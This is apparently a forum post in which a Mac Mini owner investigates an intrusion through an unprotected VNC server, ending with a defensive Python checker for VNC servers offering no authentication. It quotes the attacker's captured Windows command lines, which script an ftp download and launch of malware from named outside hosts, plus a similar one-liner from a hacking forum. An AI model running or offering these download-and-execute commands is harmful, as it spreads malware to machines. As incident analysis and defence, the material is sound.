MacMini running my TV has been compromised, tried to download winbackup.exe

I have a MacMini running Elgato's EyeTV software as my permanent HD TV setup. It's permanently hooked up to the internet and is always on. I have a universal remote for controlling EyeTV, Front Row and the rest of my Home Theater system. Until today I thought this may have been a problem with the remote.
Over the past few weeks it has been behaving erratically every now and then. The 'remote' dialog would appear on screen and it would change between channels. The video would keep switching between pause and play repeatedly. If I was watching a movie in Front Row, it would do the same, but eventually switch all the way back out to the OS. It did cross my mind that maybe someone was getting into the computer, but I didn't see how this could be happening.
My Mac Mini is hooked up to an ADSL 2 modem, which I have set up with port mappings for port 80 and a non-standard ssh port mapped to the Mini. These are the only ports open.
Today it happened again, but this time it was something quite disturbing. I was watching a movie in Front Row and it suddenly switched out back to the OS. My first response was to cover up the infrared ports on my remote, because I had thought maybe the remote was sending invalid signals. But when it got back to the OS, it renamed one of my hard disks. I sat there and watched as the following text was entered one character at a time:
cmd /c echo open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get winbackup16.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7winbackup16.exe 7exit
Based on a Google search, killyourself.info looks like a BitTorrent tracker. But I can actually ftp into the ftp1.killyourself.info server using 'mysql' and 'database' as the username and password (taken from the text shown above). The ftp server contains the following files: "YouTube.Video.Downloader.2007-GameRevolution", "h.exe", "RLPack1_1__1_.16PersonalVersion.zip", "torrentfix32.exe", "winamp533_pro.exe", "winbackup16.exe", "winsys32.exe", "woo.zip", "wrar361.exe" and "YouTube.Video.Downloader.2007-GameRevolution.rar".
A search on winbackup.exe brings up dozens of spyware and worm references. Which is fine, I don't have Windows installed on the Mini, but it is on my MacBook Pro in Parallels. If this had happened on there then I may have had a bigger problem.
So, someone somewhere is connecting into my MacMini and attempting to download and install a Windows worm/virus. I think they're getting in via VNC because I've had a VNC server running on there for the last few weeks to allow me to get in from my laptop.
The fact that it's executing windows commands means that it's probably automated and they must assume it's a windows box, which kind of rules out ssh and applescript based attacks. I've killed the VNC server now, but I don't see how they were able to get in in the first place.
I disabled all of the network ports in System Preferences and the commands stopped being executed. What I'd like to do is be able to look through any logs that may reveal what connections were made to the mini. If I can, I'd like to track down the bad guys.

I have a simpler explanation for the password thing. There isn't one set. Neither was my firewall running. I'm not sure at what point that was disabled, but I'm still not sure how the connection is getting through my ADSL modem (no port mapping for VNC). A quote from the HenWen manual seems appropriate here:
“All that is necessary for evil to triumph is for good men to do nothing...”
— Edmund Burke
And yes, I am in IT Security. At least my MBP is locked down.
I couldn't get Snort working the way the tutorials and manuals described, so I went with Wireshark (used to be called Ethereal).
And my honeypot was successful. This is now a confirmed VNC exploit.
I had everything turned off: Bluetooth, WiFi, FireWire. All my applications were shut down with the exception of TextEdit, which was sitting there waiting for remote commands to be entered; VNC Server, which is what I assumed the attacker was exploiting; and Wireshark, which was sitting there listening for network packets.
Interestingly, the ftp server is different this time. Here is the complete text of what was entered (non-printable characters aside):
5systemroot5\system32\cmd.exe
cmd /c echo open ftp.heh.pheer.info .. heh 7echo binary .. heh 7echo get heh.exe .. heh 7echo bye .. heh 7ftp -as;heh 7del heh 7start heh.exe 7exit
This was a bit different to last time. It's a different ftp server and files. I can connect to the ftp server, but the username isn't as obvious. I went with 'anonymous' and '[email protected]' and got in. On this FTP server there are only two files, "GOOGLE.exe" and "HEH.exe"
If I try and ping ftp.heh.pheer.info it resolves to mail.cppweb.com, which doesn't respond to a ping at all, but www.cppweb.com seems to be an ISP of some sort in 'Monroe, Wisconsin' (according to the front page). So chances are the attacker is a user of that ISP. It looks a bit dodgy, all of the internal links go to a 404 page.
Wireshark has a series of VNC requests coming in from the IP address 58.20.207.179, which I can't ping and doesn't come up with a name via nslookup. The IP address of both ftp.heh.pheer.info and mail.cppweb.com is: 64.73.102.119
This is a little more interesting; heh.pheer.info goes nowhere in the browser, but pheer.info resolves to www.ryan1918.com, which is apparently the number 1 source of everything. Looking at some of the posts on their front page it looks like they've been attacked a lot over the past few days, although based on some of the links and 'affiliates' it doesn't appear to be a reputable place, at least not at first glance (no offense meant to any members).
It's also pretty clear why they have been hacked so often. I tried searching for VNC in their forums and got an error, which revealed a nicely detailed SQL query showing the structure of their database. But their site can be searched via Google. Here's an interesting forum question under the topic of 'VNC Hacking':
can someone help me with uploading a file and executing after u get root access on a vnc server. ive been using windows ftp but doesnt seem to work on rooted box is there a easier was to do this or am i doing it wrong. Thanks in advance
cmd.exe /c echo open x.x.x.x > i &echo get winreg.exe >> i &echo quit >> i &ftp -As:i &start winreg.exe
http://www.ryan1918.com/viewtopic.php?p=40897&sid=aef6bf23561670b189ebfff1525064b2
And here's a link someone posted to their 'vnc bot'
http://www.ryan1918.com/viewtopic.php?t=7573&sid=f5843eae2bdd6fdfcc396008e46a13f9
I was going to submit a complaint to the IC3, but they seem to be focussed on actual monetary loss and fraud.
Can anyone suggest an appropriate way forward? I assume there must be some organisation that this information can be submitted to. Surely these kinds of attacks shouldn't simply be tolerated.
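A defender-side check for the root cause the post settles on (a VNC server reachable with no password set), added here as an example and not code from the original post: it parses the RFB handshake a VNC server sends and reports whether the "None" security type is on offer. The `probe` helper is for auditing a listener you own; the constructed handshake bytes under `__main__` stand in for a live server.

```python
import socket
import struct

# RFB (the VNC wire protocol) security types: 0, 1 and 2 come from RFC 6143,
# the others are registered extensions commonly seen on modern servers.
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def parse_version(banner: bytes) -> tuple:
    """Parse the 12-byte ProtocolVersion message, e.g. b'RFB 003.008\\n'."""
    if len(banner) != 12 or not banner.startswith(b"RFB ") or banner[-1:] != b"\n":
        raise ValueError("not an RFB ProtocolVersion message")
    major, minor = banner[4:11].split(b".")
    return int(major), int(minor)


def parse_security_types(version: tuple, payload: bytes) -> list:
    """Return the security types the server offers right after the version exchange."""
    if version <= (3, 3):
        # RFB 3.3: the server chooses for us and sends a single big-endian u32.
        (chosen,) = struct.unpack("!I", payload[:4])
        return [chosen]
    # RFB 3.7 / 3.8: a u8 count followed by that many u8 type codes (0 = failure).
    count = payload[0]
    return list(payload[1:1 + count])


def assess(types: list) -> list:
    """Turn the offered security types into plain-language findings for the owner."""
    findings = []
    if 1 in types:
        findings.append("'None' authentication offered: anyone who can reach the port gets the desktop")
    if 2 in types:
        findings.append("classic VNC Authentication offered: 8-char DES challenge, session unencrypted")
    if not types or types == [0]:
        findings.append("server refused the connection (no security types)")
    return findings


def probe(host: str, port: int = 5900, timeout: float = 5.0) -> list:
    """Run the real handshake against a VNC server you own and return the findings."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        version = parse_version(s.recv(12))
        s.sendall(b"RFB %03d.%03d\n" % version)   # echo the server's version back
        if version <= (3, 3):
            payload = s.recv(4)
        else:
            count = s.recv(1)
            payload = count + s.recv(count[0]) if count and count[0] else count
        return assess(parse_security_types(version, payload))


if __name__ == "__main__":
    # Constructed handshake: an RFB 3.8 server offering both "None" and VNC auth.
    ver = parse_version(b"RFB 003.008\n")
    for finding in assess(parse_security_types(ver, b"\x02\x01\x02")):
        print(finding)
```

A server that only offers type 1 is exactly the situation described in the post: no password dialog, just a desktop for whoever reaches the port through the modem.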
